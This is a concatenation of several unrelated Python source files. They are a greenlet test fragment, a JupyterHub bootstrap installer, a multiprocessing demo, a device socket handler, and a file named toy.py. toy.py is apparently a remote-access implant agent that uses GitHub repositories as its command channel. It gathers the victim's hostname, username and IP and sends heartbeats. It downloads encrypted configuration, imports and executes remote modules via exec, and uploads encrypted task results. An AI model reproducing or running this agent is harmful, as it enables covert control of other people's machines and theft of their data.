# at the same time we must make sure another thread executes
lock2.release()
lock1.acquire()
# now ts_current belongs to another thread
def deallocator():
greenlet.getcurrent().parent.switch()
def fthread():
lock2.acquire()
greenlet.getcurrent()
del g[0]
lock1.release()
lock2.acquire()
greenlet.getcurrent()
lock1.release()
main = greenlet.getcurrent()
g = [greenlet(deallocator)]
g[0].bomb = finalized()
g[0].switch()
t = threading.Thread(target=fthread)
t.start()
# let another thread grab ts_current and deallocate g[0]
lock2.release()
lock1.acquire()
# this is the corner stone
# getcurrent() will notice that ts_current belongs to another thread
# and start the update process, which would notice that g[0] should
# be deallocated, and that will execute an object's finalizer. Now,
# that object will let another thread run so it can grab ts_current
# again, which would likely crash the interpreter if there's no
# check for this case at the end of green_updatecurrent(). This test
# passes if getcurrent() returns correct result, but it's likely
# to randomly crash if it's not anyway.
self.assertEqual(greenlet.getcurrent(), main)
# wait for another thread to complete, just in case
t.join()
def test_dealloc_switch_args_not_lost(self):
seen = []
def worker():
# wait for the value
value = greenlet.getcurrent().parent.switch()
# delete all references to ourself
del worker[0]
initiator.parent = greenlet.getcurrent().parent
# switch to main with the value, but because
# ts_current is the last reference to us we
# return immediately
try:
greenlet.getcurrent().parent.switch(value)
finally:
seen.append(greenlet.getcurrent())
def initiator():
return 42 # implicitly falls thru to parent
worker = [greenlet(worker)]
worker[0].switch() # prime worker
initiator = greenlet(initiator, worker[0])
value = initiator.switch()
self.assertTrue(seen)
self.assertEqual(value, 42)
def test_tuple_subclass(self):
if sys.version_info[0] > 2:
# There's no apply in Python 3.x
def _apply(func, a, k):
func(*a, **k)
else:
_apply = apply # pylint:disable=undefined-variable
class mytuple(tuple):
def __len__(self):
greenlet.getcurrent().switch()
return tuple.__len__(self)
args = mytuple()
kwargs = dict(a=42)
def switchapply():
_apply(greenlet.getcurrent().parent.switch, args, kwargs)
g = greenlet(switchapply)
self.assertEqual(g.switch(), kwargs)
def test_abstract_subclasses(self):
AbstractSubclass = ABCMeta(
'AbstractSubclass',
(greenlet,),
{'run': abstractmethod(lambda self: None)})
class BadSubclass(AbstractSubclass):
pass
class GoodSubclass(AbstractSubclass):
def run(self):
pass
GoodSubclass() # should not raise
self.assertRaises(TypeError, BadSubclass)
def test_implicit_parent_with_threads(self):
if not gc.isenabled():
return # cannot test with disabled gc
N = gc.get_threshold()[0]
if N < 50:
return # cannot test with such a small N
def attempt():
lock1 = threading.Lock()
lock1.acquire()
lock2 = threading.Lock()
lock2.acquire()
recycled = [False]
def another_thread():
lock1.acquire() # wait for gc
greenlet.getcurrent() # update ts_current
lock2.release() # release gc
t = threading.Thread(target=another_thread)
t.start()
class gc_callback(object):
def __del__(self):
lock1.release()
lock2.acquire()
recycled[0] = True
class garbage(object):
def __init__(self):
self.cycle = self
self.callback = gc_callback()
l = []
x = range(N*2)
current = greenlet.getcurrent()
g = garbage()
for _ in x:
g = None # lose reference to garbage
if recycled[0]:
# gc callback called prematurely
t.join()
return False
last = greenlet()
if recycled[0]:
break # yes! gc called in green_new
l.append(last) # increase allocation counter
else:
# gc callback not called when expected
gc.collect()
if recycled[0]:
t.join()
return False
self.assertEqual(last.parent, current)
for g in l:
self.assertEqual(g.parent, current)
return True
for _ in range(5):
if attempt():
break
class TestRepr(unittest.TestCase):
def assertEndsWith(self, got, suffix):
self.assertTrue(got.endswith(suffix), (got, suffix))
def test_main_while_running(self):
r = repr(greenlet.getcurrent())
self.assertEndsWith(r, " current active started main>")
def test_main_in_background(self):
main = greenlet.getcurrent()
def run():
return repr(main)
g = greenlet(run)
r = g.switch()
self.assertEndsWith(r, ' suspended active started main>')
def test_initial(self):
r = repr(greenlet())
self.assertEndsWith(r, ' pending>')
def test_main_from_other_thread(self):
main = greenlet.getcurrent()
class T(threading.Thread):
original_main = thread_main = None
main_glet = None
def run(self):
self.original_main = repr(main)
self.main_glet = greenlet.getcurrent()
self.thread_main = repr(self.main_glet)
t = T()
t.start()
t.join(10)
self.assertEndsWith(t.original_main, ' suspended active started main>')
self.assertEndsWith(t.thread_main, ' current active started main>')
r = repr(t.main_glet)
# main greenlets, even from dead threads, never really appear dead
# TODO: Can we find a better way to differentiate that?
assert not t.main_glet.dead
self.assertEndsWith(r, ' suspended active started main>')
def test_dead(self):
g = greenlet(lambda: None)
g.switch()
self.assertEndsWith(repr(g), ' dead>')
self.assertNotIn('suspended', repr(g))
self.assertNotIn('started', repr(g))
self.assertNotIn('active', repr(g))
def test_formatting_produces_native_str(self):
# https://github.com/python-greenlet/greenlet/issues/218
# %s formatting on Python 2 was producing unicode, not str.
g_dead = greenlet(lambda: None)
g_not_started = greenlet(lambda: None)
g_cur = greenlet.getcurrent()
for g in g_dead, g_not_started, g_cur:
self.assertIsInstance(
'%s' % (g,),
str
)
self.assertIsInstance(
'%r' % (g,),
str,
)
if __name__ == '__main__':
unittest.main()
|
bootstrap.py
|
"""
Bootstrap an installation of TLJH.
Sets up just enough TLJH environments to invoke tljh.installer.
This script is run as:
curl <script-url> | sudo python3 -
Constraints:
- The entire script should be compatible with Python 3.6, which is the on
Ubuntu 18.04+.
- The script should parse in Python 3.5 as we print error messages for using
Ubuntu 16.04+ which comes with Python 3.5 by default. This means no
f-strings can be used.
- The script must depend only on stdlib modules, as no previous installation
of dependencies can be assumed.
Environment variables:
TLJH_INSTALL_PREFIX Defaults to "/opt/tljh", determines the location
of the tljh installations root folder.
TLJH_BOOTSTRAP_PIP_SPEC From this location, the bootstrap script will
pip install --upgrade the tljh installer.
TLJH_BOOTSTRAP_DEV Determines if --editable is passed when
installing the tljh installer. Pass the values
yes or no.
Command line flags:
The bootstrap.py script accept the following command line flags. All other
flags are passed through to the tljh installer without interception by this
script.
--show-progress-page Starts a local web server listening on port 80 where
logs can be accessed during installation. If this is
passed, it will pass --progress-page-server-pid=<pid>
to the tljh installer for later termination.
"""
import os
from http.server import SimpleHTTPRequestHandler, HTTPServer
import multiprocessing
import subprocess
import sys
import logging
import shutil
import urllib.request
progress_page_favicon_url = "https://raw.githubusercontent.com/jupyterhub/jupyterhub/HEAD/share/jupyterhub/static/favicon.ico"
progress_page_html = """
<html>
<head>
<title>The Littlest Jupyterhub</title>
</head>
<body>
<meta http-equiv="refresh" content="30" >
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width">
<img class="logo" src="https://raw.githubusercontent.com/jupyterhub/the-littlest-jupyterhub/HEAD/docs/images/logo/logo.png">
<div class="loader center"></div>
<div class="center main-msg">Please wait while your TLJH is setting up...</div>
<div class="center logs-msg">Click the button below to see the logs</div>
<div class="center tip" >Tip: to update the logs, refresh the page</div>
<button class="logs-button center" onclick="window.location.href='/logs'">View logs</button>
</body>
<style>
button:hover {
background: grey;
}
.logo {
width: 150px;
height: auto;
}
.center {
margin: 0 auto;
margin-top: 50px;
text-align:center;
display: block;
}
.main-msg {
font-size: 30px;
font-weight: bold;
color: grey;
text-align:center;
}
.logs-msg {
font-size: 15px;
color: grey;
}
.tip {
font-size: 13px;
color: grey;
margin-top: 10px;
font-style: italic;
}
.logs-button {
margin-top:15px;
border: 0;
color: white;
padding: 15px 32px;
font-size: 16px;
cursor: pointer;
background: #f5a252;
}
.loader {
width: 150px;
height: 150px;
border-radius: 90%;
border: 7px solid transparent;
animation: spin 2s infinite ease;
animation-direction: alternate;
}
@keyframes spin {
0% {
transform: rotateZ(0deg);
border-top-color: #f17c0e
}
100% {
transform: rotateZ(360deg);
border-top-color: #fce5cf;
}
}
</style>
</head>
</html>
"""
logger = logging.getLogger(__name__)
# This function is needed both by the process starting this script, and by the
# TLJH installer that this script execs in the end. Make sure its replica at
# tljh/utils.py stays in sync with this version!
def run_subprocess(cmd, *args, **kwargs):
"""
Run given cmd with smart output behavior.
If command succeeds, print output to debug logging.
If it fails, print output to info logging.
In TLJH, this sends successful output to the installer log,
and failed output directly to the user's screen
"""
logger = logging.getLogger('tljh')
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *args, **kwargs)
printable_command = ' '.join(cmd)
if proc.returncode != 0:
# Our process failed! Show output to the user
logger.error('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
logger.error(proc.stdout.decode())
raise subprocess.CalledProcessError(cmd=cmd, returncode=proc.returncode)
else:
# This goes into installer.log
logger.debug('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
# This produces multi line log output, unfortunately. Not sure how to fix.
# For now, prioritizing human readability over machine readability.
logger.debug(proc.stdout.decode())
def ensure_host_system_can_install_tljh():
"""
Check if TLJH is installable in current host system and exit with a clear
error message otherwise.
"""
def get_os_release_variable(key):
"""
Return value for key from /etc/os-release
/etc/os-release is a bash file, so should use bash to parse it.
Returns empty string if key is not found.
"""
return subprocess.check_output([
'/bin/bash', '-c',
"source /etc/os-release && echo ${{{key}}}".format(key=key)
]).decode().strip()
# Require Ubuntu 18.04+
distro = get_os_release_variable('ID')
version = float(get_os_release_variable('VERSION_ID'))
if distro != 'ubuntu':
print('The Littlest JupyterHub currently supports Ubuntu Linux only')
sys.exit(1)
elif float(version) < 18.04:
print('The Littlest JupyterHub requires Ubuntu 18.04 or higher')
sys.exit(1)
# Require Python 3.6+
if sys.version_info < (3, 6):
print("bootstrap.py must be run with at least Python 3.6")
sys.exit(1)
# Require systemd (systemctl is a part of systemd)
if not shutil.which('systemd') or not shutil.which('systemctl'):
print("Systemd is required to run TLJH")
# Provide additional information about running in docker containers
if os.path.exists('/.dockerenv'):
print("Running inside a docker container without systemd isn't supported")
print("We recommend against running a production TLJH instance inside a docker container")
print("For local development, see http://tljh.jupyter.org/en/latest/contributing/dev-setup.html")
sys.exit(1)
class ProgressPageRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/logs":
with open("/opt/tljh/installer.log", "r") as log_file:
logs = log_file.read()
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write(logs.encode('utf-8'))
elif self.path == "/index.html":
self.path = "/var/run/index.html"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/favicon.ico":
self.path = "/var/run/favicon.ico"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/":
self.send_response(302)
self.send_header('Location','/index.html')
self.end_headers()
else:
SimpleHTTPRequestHandler.send_error(self, code=403)
def main():
"""
This script intercepts the --show-progress-page flag, but all other flags
are passed through to the TLJH installer script.
The --show-progress-page flag indicates that the bootstrap script should
start a local webserver temporarily and report its installation progress via
a web site served locally on port 80.
"""
ensure_host_system_can_install_tljh()
# Various related constants
install_prefix = os.environ.get('TLJH_INSTALL_PREFIX', '/opt/tljh')
hub_prefix = os.path.join(install_prefix, 'hub')
python_bin = os.path.join(hub_prefix, 'bin', 'python3')
pip_bin = os.path.join(hub_prefix, 'bin', 'pip')
initial_setup = not os.path.exists(python_bin)
# Attempt to start a web server to serve a progress page reporting
# installation progress.
tljh_installer_flags = sys.argv[1:]
if "--show-progress-page" in tljh_installer_flags:
# Remove the bootstrap specific flag and let all other flags pass
# through to the installer.
tljh_installer_flags.remove("--show-progress-page")
# Write HTML and a favicon to be served by our webserver
with open("/var/run/index.html", "w+") as f:
f.write(progress_page_html)
urllib.request.urlretrieve(progress_page_favicon_url, "/var/run/favicon.ico")
# If TLJH is already installed and Traefik is already running, port 80
# will be busy and we will get an "Address already in use" error. This
# is acceptable and we can ignore the error.
try:
# Serve the loading page until manually aborted or until the TLJH
# installer terminates the process
def serve_forever(server):
try:
server.serve_forever()
except KeyboardInterrupt:
pass
progress_page_server = HTTPServer(("", 80), ProgressPageRequestHandler)
p = multiprocessing.Process(target=serve_forever, args=(progress_page_server,))
p.start()
# Pass the server's pid to the installer for later termination
tljh_installer_flags.extend(["--progress-page-server-pid", str(p.pid)])
except OSError:
pass
# Set up logging to print to a file and to stderr
os.makedirs(install_prefix, exist_ok=True)
file_logger_path = os.path.join(install_prefix, 'installer.log')
file_logger = logging.FileHandler(file_logger_path)
# installer.log should be readable only by root
os.chmod(file_logger_path, 0o500)
file_logger.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
file_logger.setLevel(logging.DEBUG)
logger.addHandler(file_logger)
stderr_logger = logging.StreamHandler()
stderr_logger.setFormatter(logging.Formatter('%(message)s'))
stderr_logger.setLevel(logging.INFO)
logger.addHandler(stderr_logger)
logger.setLevel(logging.DEBUG)
if not initial_setup:
logger.info('Existing TLJH installation detected, upgrading...')
else:
logger.info('Existing TLJH installation not detected, installing...')
logger.info('Setting up hub environment...')
logger.info('Installing Python, venv, pip, and git via apt-get...')
# In some very minimal base VM images, it looks like the "universe" apt
# package repository is disabled by default, causing bootstrapping to
# fail. We install the software-properties-common package so we can get
# the add-apt-repository command to make sure the universe repository is
# enabled, since that's where the python3-pip package lives.
#
# In Ubuntu 21.10 DEBIAN_FRONTEND has found to be needed to avoid
# getting stuck on an input prompt during apt-get install.
#
apt_get_adjusted_env = os.environ.copy()
apt_get_adjusted_env["DEBIAN_FRONTEND"] = "noninteractive"
run_subprocess(['apt-get', 'update'])
run_subprocess(['apt-get', 'install', '--yes', 'software-properties-common'], env=apt_get_adjusted_env)
run_subprocess(['add-apt-repository', 'universe', '--yes'])
run_subprocess(['apt-get', 'update'])
run_subprocess(['apt-get', 'install', '--yes', 'python3', 'python3-venv', 'python3-pip', 'git'], env=apt_get_adjusted_env)
logger.info('Setting up virtual environment at {}'.format(hub_prefix))
os.makedirs(hub_prefix, exist_ok=True)
run_subprocess(['python3', '-m', 'venv', hub_prefix])
# Upgrade pip
# Keep pip version pinning in sync with the one in unit-test.yml!
# See changelog at https://pip.pypa.io/en/latest/news/#changelog
logger.info('Upgrading pip...')
run_subprocess([pip_bin, 'install', '--upgrade', 'pip==21.3.*'])
# Install/upgrade TLJH installer
tljh_install_cmd = [pip_bin, 'install', '--upgrade']
if os.environ.get('TLJH_BOOTSTRAP_DEV', 'no') == 'yes':
tljh_install_cmd.append('--editable')
tljh_install_cmd.append(
os.environ.get(
'TLJH_BOOTSTRAP_PIP_SPEC',
'git+https://github.com/jupyterhub/the-littlest-jupyterhub.git'
)
)
if initial_setup:
logger.info('Installing TLJH installer...')
else:
logger.info('Upgrading TLJH installer...')
run_subprocess(tljh_install_cmd)
# Run TLJH installer
logger.info('Running TLJH installer...')
os.execv(python_bin, [python_bin, '-m', 'tljh.installer'] + tljh_installer_flags)
if __name__ == '__main__':
main()
|
thread.py
|
from multiprocessing import Process, Queue, Pool
import os
import time
import random
# def queue_demo(func):
# def wrapper(*args, **kwargs):
# print(f'fetch task from queue: {os.getpid()}')
# func(*args, **kwargs)
# return wrapper
# @queue_demo
def read(q):
while True:
if q.empty():
return
else:
t = q.get()
print(f'get {t} from queue, process ID < {os.getpid()} >')
time.sleep(t / 10)
def run(num):
start = time.time()
queue_list = [random.randint(1, 4) for _ in range(100)]
queue = Queue()
for _ in queue_list:
queue.put(_)
processes = []
for _ in range(num):
processes.append(
Process(target=read, args=(queue, ))
)
for process in processes:
process.start()
for process in processes:
process.join()
end = time.time()
print(f'done. {round(end - start, 4)} seconds used.')
if __name__ == '__main__':
# run(1)
# run(2)
# run(4)
run(4)
|
vhSockets.py
|
# Websocket handler
from socketIO_client_nexus import SocketIO, LoggingNamespace
import threading, json, math
class vhSockets:
devices = []
connected = False
win = False
socketIO = None
#bindable events
onConnection = None # bool connected
def init(self, win):
self.win = win
print("Connecting to", win.server, LoggingNamespace)
socketIO = SocketIO(win.server, 80)
socketIO.on('connect', self.on_connect)
socketIO.on('disconnect', self.on_disconnect)
socketIO.on('reconnect', self.on_connect)
socketIO.on('dev_online', self.on_device_connected)
self.socketIO = socketIO
thrd = threading.Thread(target=socketIO.wait)
thrd.daemon = True
thrd.start()
#sends numbers to the socket
def sendP( self, colorBuffer ):
self.socketIO.emit('p', colorBuffer.hex())
def sendProgram( self, intensity, duration ):
easing = "Quintic.In"
stages = [
{"i":intensity},
{"d":round(duration*1000), "e":easing}
]
if duration >= 1.2:
numBounces = math.floor((duration-1)/0.2)
stages = [
{"i":intensity},
{"d":200, "i":0, "e":"Quintic.In", "r":numBounces},
{"i":intensity},
{"d":round((duration-numBounces*0.2)*1000), "e":easing}
]
program = {
"id" : self.win.deviceID,
"type" : "vib",
"data" : {
"stages" : stages
}
}
self.socketIO.emit('GET', program)
def getDeviceByName(self, name):
for i in range(0, len(self.devices)):
if self.devices[i] == name:
return i
return -1
def on_connect(self):
self.connected = True
win = self.win
print('<<WS Evt>> We have connection, sending app name:', win.appName)
self.socketIO.emit('app', win.appName, self.on_name)
if self.onConnection:
self.onConnection(True)
def on_disconnect(self):
self.connected = False
if self.onConnection:
self.onConnection(False)
print('<<WS Evt>> on_disconnect')
def on_hookup(*args):
self = args[0]
self.devices = args[1]
print("<<WS Evt>> New devices", self.devices)
def on_name(*args):
self = args[0]
print('<<WS Evt>> App name accepted, hooking up our device')
self.setDeviceId()
def resetDevice(self):
self.socketIO.emit('hookdown', [], self.setDeviceId)
def on_device_connected(*args):
print('Device connected, resetting it')
self = args[0]
self.resetVib()
def resetVib(self):
self.sendP(bytes([0,0,0,0,0]))
def setDeviceId(*args):
self = args[0]
self.socketIO.emit('hookup', self.win.deviceID, self.on_hookup)
|
toy.py
|
# -*- encoding: utf-8 -*-
import sys
import getpass
import json
import platform
import random
import socket
import string
import time
import threading
import logging
import Queue
try:
from urllib2 import urlopen, Request
except ImportError:
from urllib.request import urlopen, Request
from commander.thirdparty.httpimport import add_remote_repo, remove_remote_repo
from commander.thirdparty.httpimport import remote_repo, github_repo
try:
import Crypto
except ImportError:
if platform.system() == 'linux':
from toy.lib.lnx.Crypto import Random
from toy.lib.lnx.Crypto.PublicKey import RSA
from toy.lib.lnx.Crypto.Cipher import AES, PKCS1_OAEP
elif platform.system() == 'windows':
from toy.lib.win.Crypto import Random
from toy.lib.win.Crypto.PublicKey import RSA
from toy.lib.win.Crypto.Cipher import AES, PKCS1_OAEP
# fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s'
fmt = '[%(asctime)s] [%(levelname)s] [ %(filename)s:%(lineno)s ] %(message)s '
logging.basicConfig(level=logging.INFO, format=fmt)
class GitHubAPI(object):
def __init__(self, guser=None, gpwd=None, gtoken=None,
grepo=None, gbranch='master'):
if not gtoken and not gpwd:
raise('Token or password must have one')
self.owner = guser
self.gpwd = gpwd
self.token = gtoken
self.repo = grepo
self.branch = gbranch
@staticmethod
def _request(method='GET', uri=None, data=None, headers=None, timeout=30):
url = 'https://api.github.com'
url = uri if url in uri else (url + uri)
req = Request(url, timeout=timeout)
req.headers = {'User-Agent': 'App',
'Accept': 'application/vnd.github.v3+json'}
if headers:
req.headers.update(headers)
req.get_method = lambda: method
if data:
data = json.dumps(data, ensure_ascii=False)
try:
logging.info('Start to request: %s' % url)
logging.debug('Request data: %s' % data)
rsp = urlopen(req, data)
except Exception as e:
logging.error('[-] Request error: %s' % url)
logging.exception(e)
rsp = None
return rsp
def request(self, method='GET', uri=None, data=None, headers=None):
headers = headers or {}
if self.token:
headers.update({'Authorization': 'token ' + self.token})
else:
up = ':'.join((self.owner, self.gpwd))
auth_hash = up.encode('base64').strip()
headers.update({'Authorization': 'Basic ' + auth_hash})
return GitHubAPI._request(method=method, uri=uri,
data=data, headers=headers)
def put(self, path, content, msg='new file'):
"""
PUT /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
data = {'message': msg, 'content': content.encode('base64')}
logging.info('[*] Save result to %s' % path)
return self.request('PUT', uri, data)
def get(self, path):
"""
GET /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
rsp = self.request(uri=uri)
content = json.loads(rsp.read().strip()) if rsp else {}
# return content.get('content', '').decode('base64'), content
return content
def update(self, path, content, sha, msg='update file'):
"""
PUT /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
data = {'message': msg,
'content': content.encode('base64'),
'sha': sha}
return self.request('PUT', uri, data)
def delete(self, path, sha, msg='delete file'):
"""
DELETE /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
data = {'message': msg, 'sha': sha}
return self.request('DELETE', uri, data)
def Threaded(func):
def wrapper(*_args, **kwargs):
t = threading.Thread(target=func, args=_args)
t.daemon = True
t.start()
return
return wrapper
class Agent(object):
# python -c "import os;print(os.urandom(8).hex())"
uid = '602841a3ee0ecb12'
gid = 'aecdf0678459dcd8'
def __init__(self, owner, repo, branch='master',
conf_path='config', debug=False):
self.owner = owner
self.repo = repo
self.branch = branch
self._conf_path = conf_path
self.debug = debug
# self.idle = True
self.silent = False
# self.last_active = time.time()
self.failed_connections = 0
self.conf = None
self.conf_sha = None
self.gh_conf = None
self.gh_result = None
self.cmdpub = '' # encode with hex
self.prikey = ''
self.aes_key = ''
self.tasks = set()
self.modules = {}
self.run_modules = Queue.Queue()
self.task_queue = Queue.Queue()
self.modules_ok = []
self.info = self.get_info()
self.init()
self.run_task()
def init(self):
self.conf = self.get_conf_try(self.conf_url)
if not self.conf:
return
self.parse_conf()
self.gh = GitHubAPI(self.gh_result[0], None,
self.gh_result[1], self.gh_result[2])
self.heartbeat()
def parse_conf(self):
try:
self.gh_conf = self.conf['BaseAcc'].split('$$')
self.gh_result = self.conf['RetAcc'].split('$$')
self.ret_path = self.conf['RetPath']
self.hbt = self.conf['HBTime']
self._conf_path = self.conf['ConfPath']
self.aes_key = self.conf['AesKey']
self.cmdpub = self.conf['SrvPubKey']
self.prikey = self.conf['ToyPriKey']
self.modules = self.conf['Modules']
self.owner = self.gh_conf[0]
self.token = self.gh_conf[1]
self.repo = self.gh_conf[2]
for task in self.conf['Tasks']:
self.tasks.add(task)
self.conf = None
except Exception as e:
if self.debug:
print(e)
@property
def base_url(self):
_base_url = 'https://raw.githubusercontent.com/'
_base_url += '/'.join((self.owner, self.repo, self.branch, ''))
return _base_url
@property
def conf_path(self):
name = '-'.join((self.gid, self.uid)) + '.conf'
conf_path = '/'.join((self._conf_path, name))
return conf_path
@property
def conf_url(self):
return self.base_url + self.conf_path
# @property
# def report_base(self):
# name = '.'.join((self.gid, self.uid))
# _report_base = '/'.join((self.ret_path, name))
# return _report_base
# def task_conf_url(self, taskid):
# path = self.conf['ConfPath'] + 'task/'
# path += taskid + '.conf'
# url = 'https://raw.githubusercontent.com'
# url += '/%s/%s/%s/%s' % (self.owner, self.repo,
# self.branch, path)
# return url
@Threaded
def heartbeat(self):
path = '/'.join((self.ret_path, 'hbt', '-'.join((self.gid, self.uid)) + '.data'))
while True:
try:
# info = self.get_info()
self.info['timestamp'] = time.time()
# self.report(str(time.time()), path, plain=True)
self.report(json.dumps(self.info), path, plain=True)
time.sleep(self.hbt)
if self.is_conf_update():
# self.init(self.conf_url)
self.parse_conf()
self.moudle_check()
except Exception as e:
if self.debug:
print(e)
def get_info(self):
ip = self.get_host_ip()
plat = platform.system() + " " + platform.release()
hostname = socket.gethostname()
username = getpass.getuser()
timestamp = time.time()
return dict(ip=ip, platform=plat, hostname=hostname,
username=username, timestamp=timestamp)
@staticmethod
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 53))
ip = s.getsockname()[0]
finally:
s.close()
return ip
def get_conf_try(self, url, trynum=3):
num = 0
conf = None
while num < trynum:
conf = self.get_content(url)
if conf:
break
num += 1
return conf
# def get_task(self, taskid):
# conf = self.get_content(self.task_conf_url(taskid))
# if not conf:
# return
# # Todo...
# def parse_task_conf(self, conf):
# pass
def is_conf_update(self):
# check github file sha
try:
c = self.gh.get(self.conf_path)
if c['sha'] == self.conf_sha:
return False
self.conf_sha = c['sha']
self.conf = self.decrypt(c['content'].decode('base64'))
return True
except Exception as e:
if self.debug:
print(e)
return False
def get_content(self, url):
try:
conf = urlopen(url).read()
if conf:
conf = self.decrypt(conf.strip())
return json.loads(conf)
else:
return None
except Exception as e:
if self.debug:
print(e)
return None
def report(self, msg, path, plain=False):
content = msg if plain else self.encrypt(msg)
data = self.gh.get(path)
if not data:
s = self.gh.put(path, content)
else:
s = self.gh.update(path, content, data['sha'])
if self.debug:
print(s)
def moudle_check(self):
for task in self.tasks:
requires = task.get('requires', None)
if requires:
for r in requires:
pkg = r.get('package', '')
mod = r.get('module', None)
self.load(r['name'], r['url'], pkg, mod)
self.loadGH(task['mod'])
self.task_run_check(task)
for mod in self.modules:
self.loadGH(mod)
self.run_modules.put(dict(name=mod.__name__, mod=mod))
# @Threaded
def task_run_check(self, task):
now = time.time()
if task['start'] > task['end']:
self.tasks.remove(task)
if now >= task['start'] and now <= task['end']:
task['build'] = now
# task['nextrun'] = 0
if task['step'] > 0:
task['start'] += task['step']
# task['nextrun'] = nextrun
self.run_modules.put(task.copy())
return task
# elif now < task['start']:
# return task
def random_key(self, num=16):
return ''.join(random.sample(string.printable, num))
def encrypt(self, content, raw=False, aes=True):
if raw:
return content
rkey = RSA.importKey(self.cmdpub.decode('hex'))
if not aes:
return self.rsa_encrypt(content, rkey).encode('base64')
akey = self.random_key()
ec = self.aes_encrypt(content, akey)
ek = self.rsa_encrypt(akey, rkey)
return ';;'.join((ec, ek)).encode('base64')
def decrypt(self, content):
content = content.decode('base64') if content else ''
if ';;[]' in content:
return content[:-4]
rk = RSA.importKey(self.prikey)
if ';;' in content:
# parse encrypt content and encrypt key
c, e = content.split(';;')
if not e:
# no encrypt key
return self.aes_decrypt(c, self.aes_key)
else:
# have encrypt key, decrypt the key
ak = self.rsa_decrypt(e, rk)
# decrypt the content
return self.aes_decrypt(c, ak)
else:
# no aes encrypt
return self.rsa_decrypt(content, rk)
def rsa_encrypt(self, content, key=None):
if not key:
return content
cipher = PKCS1_OAEP.new(key)
return cipher.encrypt(content)
def rsa_decrypt(self, content, key=None):
if not key:
return content
if not key.has_private():
print('[!] Not a valid PrivateKey!')
return None
cipher = PKCS1_OAEP.new(key)
return cipher.decrypt(content)
def aes_encrypt(self, content, key):
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CFB, iv)
msg = iv + cipher.encrypt(content.decode('utf-8'))
return msg
def aes_decrypt(self, content, key):
iv = content[:AES.block_size]
msg = content[AES.block_size:]
cipher = AES.new(key, AES.MODE_CFB, iv)
msg = cipher.decrypt(msg)
return msg.encode('utf-8')
@staticmethod
def load(repo, url, package='', module=None):
if not package and not module:
try:
logging.info('Try to import module')
add_remote_repo([repo], url)
exec "import %s" % repo
except Exception:
logging.error('Exception with import %s' % repo)
pass
else:
pk = '.'.join((repo, package)) if package.split(
'.')[0] != repo else package
md = ', '.join(module) if isinstance(
module, (list, tuple)) else module
pk = pk[:-1] if pk.endswith('.') else pk
with remote_repo([repo], url):
exec "from %s import %s" % (pk, md)
def loadGH(self, module, package='moudle', user=None, repo=None):
user = user or self.owner
repo = repo or self.repo
pk = '.'.join((repo, package)) if package.split(
'.')[0] != repo else package
md = ','.join(module) if isinstance(
module, (list, tuple)) else module
pk = pk[:-1] if pk.endswith('.') else pk
with github_repo(user, repo):
exec "from %s import %s" % (pk, md)
def unload(self, module, url=None):
logging.info('Try to unload module')
url = url or self.base_url
remove_remote_repo(url)
if module in sys.modules:
del module
# def install(self):
# for url, pkgs in self.base_modules.items():
# if not isinstance(pkgs, (list, tuple)):
# pkgs = [pkgs]
# for p in pkgs:
# self.load(p, url)
# for pkg in self.run_modules:
# self.load_module(pkg['module'])
# self.init = False
# def parse_require(self, pkg):
# requires = pkg.get('requires', None)
# if requires:
# for k, v in requires.items():
# self.load(v, k)
# def check(self, url=None):
# url = url or self.conf_url
# conf = self.get_config(url)
# self.parse_conf(conf)
# for task in self.run_modules:
# self.load_module(task['module'])
# tasks = self.load_task(self.task_url) if self.task_url else []
# self.run_modules += tasks
# def load_module(self, mod, pkg='toy.modules'):
# try:
# logging.info('Import %s from %s' % (mod, pkg))
# self.load(self.repo, )
# exec "from %s import %s" % (pkg, mod)
# except Exception:
# logging.error("Import %s error" % '.'.join((pkg, mod)))
# def load_task(self, task_url):
# tasks = self.get(task_url)
# logging.info('[+] Get task config: %s' % tasks)
# if tasks:
# tasks = json.loads(tasks)
# logging.info('[*] Get task %s from %s' % (tasks['name'], task_url))
# requires = tasks.get('require', {})
# for u, p in requires.items():
# for k in p:
# logging.info('[*] Load required packages: %s from %s' % (k, u))
# self.load([k], u)
# self.load(tasks['name'], tasks['url'])
# for task in tasks['task']:
# self.load_module(task['module'], tasks['name'] + '.modules')
# else:
# tasks = []
# return tasks
def worker(self, m, args=None, kwargs=None):
args = args or []
kwargs = kwargs or {}
task_name = kwargs.pop('task_name') or m.__name__
build = int(kwargs.pop('build'))
start = int(kwargs.pop('start'))
task_id = kwargs.pop('taskid')
path = '/'.join((self.ret_path, 'res', '.'.join((self.uid, task_id, 'data'))))
self.task_queue.put(1)
if self.debug:
print(sys.modules[m])
result = sys.modules[m].run(*args, **kwargs) or 'Err'
self.task_queue.get()
ret = dict(BuildTime=str(build), StartTime=str(start), Result=result)
self.report(json.dumps(ret), path)
return
@Threaded
def run_task(self):
# self.install()
while True:
if not self.run_modules.empty:
task = self.run_modules.get()
logging.info("run task %s" % task['mod'])
mod = 'toy.module.%s' % task['mod']
arg = task.get('args', ())
kws = task.get('kws', {})
kws['task_name'] = task.get('name')
kws['build'] = task.get('build')
kws['start'] = time.time()
kws['taskid'] = task.get('taskid')
try:
t = threading.Thread(
target=self.worker, args=(mod, arg, kws))
t.daemon = True
t.start()
time.sleep(random.randint(1, 10))
except Exception as e:
if self.debug:
print(e)
logging.error('run exception')
# time.sleep(self.cf)
time.sleep(random.randint(10, 50))
